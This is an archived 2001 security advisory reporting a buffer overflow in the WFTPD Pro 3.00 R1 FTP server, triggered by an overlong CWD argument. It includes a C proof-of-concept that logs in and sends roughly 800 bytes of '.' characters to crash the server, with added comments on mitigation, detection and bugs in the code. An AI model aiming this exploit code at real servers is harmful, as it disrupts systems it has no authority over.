
 
From: se00020LION.CC
Date: Sat Mar 03 2001 - 12:51:52 CST


    When sending a command (cwd) followed by a long
    argument (~500 char '.')
    the server crashes with:

    Anwendungspopup: WFTPD Service Control:
    WFTPD.EXE - Fehler in Anwendung:
    Die Anweisung in "0x2e2e2e2e" verweist auf
    Speicher
    in "0x2e2e2e2e". Der Vorgang
    "read" konnte nicht auf dem Speicher durchgeführt
    werden.

    which means in English: The instruction at 0x2e2e2e2e
    referenced memory at 0x2e2e2e2e; the memory could not
    be read.

    Executing arbitrary code is possible

    The author has been contacted

    ----------------------
    se00020fhs-hagenberg.ac.at or
    se00020lion.cc

    Tested on win2k using the trial version of WFTPD 3.00
    R1

    Simple exploit:

    //WFTPD Pro 3.00 R1 Buffer Overflow exploit
    //written by se00020fhs-hagenberg.ac.at

    #include <stdio.h>
    #include <winsock.h>
    #include <windows.h>
    #include <malloc.h>

    // Proof-of-concept from the report. It connects to the author's test
    // host, performs a minimal FTP login ("USER test", empty "PASS"), then
    // sends a CWD whose argument is the '.'-filled remainder of an 800-byte
    // buffer (796 bytes, not the "~500" the prose mentions).
    // Defender's reading: the faulting address 0x2e2e2e2e quoted above is
    // four ASCII '.' (0x2e) bytes, so the overlong argument overwrote a
    // control-flow value inside the server -- the classic stack-overflow
    // signature, consistent with the report's "arbitrary code" claim.
    // Mitigation: the server must bound the length of a command argument
    // before copying it (check the vendor for a fixed release, and restrict
    // who can reach the FTP port meanwhile). Detection: alert on FTP commands
    // whose argument length far exceeds any legitimate path.
    // NOTE: `void main` is non-standard C; `int main(void)` is the
    // conforming form.
    void main(){
            SOCKET sock_victim;
            WORD version=MAKEWORD(1,1);   // request Winsock 1.1
            WSADATA wsadata;
            SOCKADDR_IN victim;
            int sockid;
            char buffer[1024];
            // "CWD " occupies the first 4 bytes; aggregate init zero-fills
            // the remaining 796.
            char exploitbuffer[800]={"CWD "};
            char recvbuffer[1024];

            WSAStartup(version, &wsadata);   // return value unchecked
            
            sock_victim=socket(AF_INET,
    SOCK_STREAM, IPPROTO_TCP);
            victim.sin_family=AF_INET;
            // hard-coded address of the author's test host
            victim.sin_addr.s_addr=inet_addr
    ("10.17.3.44");
            victim.sin_port=htons(21);
            // NOTE: connect() returns 0 or SOCKET_ERROR, not a socket handle,
            // so the closesocket(sockid) at the end closes a bogus handle.
            sockid=connect(sock_victim, (sockaddr*)
    &victim, sizeof(victim));
            
        
            // Read the banner, then the two login responses; every reply is
            // discarded. NOTE: '/0' is a multi-character constant, not '\0',
            // so these memset() calls do not reliably clear the buffer.
            recv(sock_victim, recvbuffer, sizeof
    (recvbuffer),0);
            memset(recvbuffer, '/0',sizeof(recvbuffer));
            send(sock_victim, "USER test\r\n",strlen
    ("USER test\r\n"),0);
             recv(sock_victim, recvbuffer, sizeof
    (recvbuffer),0);
            memset(recvbuffer, '/0',sizeof(recvbuffer));
            send(sock_victim, "PASS\r\n",strlen
    ("PASS\r\n"),0);
            recv(sock_victim, recvbuffer, sizeof
    (recvbuffer),0);
            memset(recvbuffer, '/0',sizeof(recvbuffer));
            

            // Fill bytes 4..799 with '.' -- the overlong CWD argument.
            memset(exploitbuffer+4,'.',sizeof
    (exploitbuffer)-4);
            // NOTE: after the memset exploitbuffer has no NUL terminator, so
            // "%s" reads past its end (undefined behavior in the PoC itself);
            // the send() below also transmits all 1024 bytes of buffer, not
            // just the formatted command.
            sprintf(buffer,"%s\r\n",exploitbuffer);
            
            send(sock_victim, buffer , sizeof(buffer),0);
            recv(sock_victim, recvbuffer, sizeof
    (recvbuffer),0);

            closesocket(sockid);   // see note at connect(): not a socket handle
            closesocket(sock_victim);

    }